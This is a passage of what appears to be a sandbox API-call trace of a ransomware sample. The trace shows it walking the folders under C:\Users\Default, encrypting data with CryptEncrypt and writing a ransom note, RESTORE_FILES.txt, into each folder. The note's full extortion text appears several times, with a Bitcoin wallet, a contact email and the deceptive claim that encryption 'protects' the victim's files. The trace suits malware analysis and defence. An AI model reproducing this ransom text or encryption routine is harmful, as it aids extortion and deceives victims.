length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.052] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.053] lstrlenA (lpString="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") returned 684 [0095.053] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0095.053] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.053] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.053] CloseHandle (hObject=0x150) returned 1 [0095.053] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="Windows") returned -1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="Program Files") returned -1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="Program Files (x86)") returned -1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="$Recycle.bin") returned 1 [0095.053] lstrcmpiW (lpString1="CTLs", lpString2="System Volume Information") returned -1 [0095.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned 73 [0095.053] lstrcmpW (lpString1="CTLs", lpString2=".") returned 1 [0095.053] lstrcmpW (lpString1="CTLs", lpString2="..") returned 1 [0095.054] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned 75 [0095.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0095.054] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.054] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.054] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.054] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.054] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.054] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.") returned 75 [0095.054] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.054] StrStrIW 
(lpFirst=".", lpSrch=".protected") returned 0x0 [0095.054] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.054] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.054] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.054] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0095.054] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.054] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.054] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.054] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.054] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.054] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\..") returned 76 [0095.054] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.054] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.054] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.054] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.055] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0095.055] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0095.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\.." (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.055] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.055] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.055] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt") returned 91 [0095.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.055] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.055] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.056] lstrlenA (lpString="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") returned 684 [0095.056] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0095.056] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.056] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.057] CloseHandle (hObject=0x150) returned 1 [0095.057] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0095.057] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0095.057] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt") returned 86 [0095.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.057] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.057] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0095.058] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.058] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.058] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.058] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0095.058] CloseHandle (hObject=0x14c) returned 1 [0095.059] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0095.059] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0095.060] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt") returned 83 [0095.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0095.060] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.060] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0095.061] lstrlenA (lpString="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") returned 684 [0095.061] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0095.061] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.061] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.061] CloseHandle (hObject=0xd8) returned 1 [0095.061] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0095.061] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0095.061] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0095.062] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0095.062] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt") returned 64 [0095.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.063] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.063] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0095.064] lstrlenA (lpString="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") returned 684 [0095.064] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0095.064] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.064] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.064] CloseHandle (hObject=0xd4) returned 1 [0095.064] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.064] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.064] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\RESTORE_FILES.txt") returned 54 [0095.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.065] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.065] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.066] lstrlenA (lpString="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") returned 684 [0095.066] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.066] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.066] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.066] CloseHandle (hObject=0xb4) returned 1 [0095.067] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.067] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.067] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\RESTORE_FILES.txt") returned 46 [0095.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.067] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.068] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.068] lstrlenA (lpString="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") returned 684 [0095.068] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.068] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.068] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.069] CloseHandle (hObject=0xa4) returned 1 [0095.069] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0095.069] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0095.069] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data") returned 37 [0095.069] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0095.069] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0095.069] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data\\*") returned 39 [0095.069] FindFirstFileW (in: 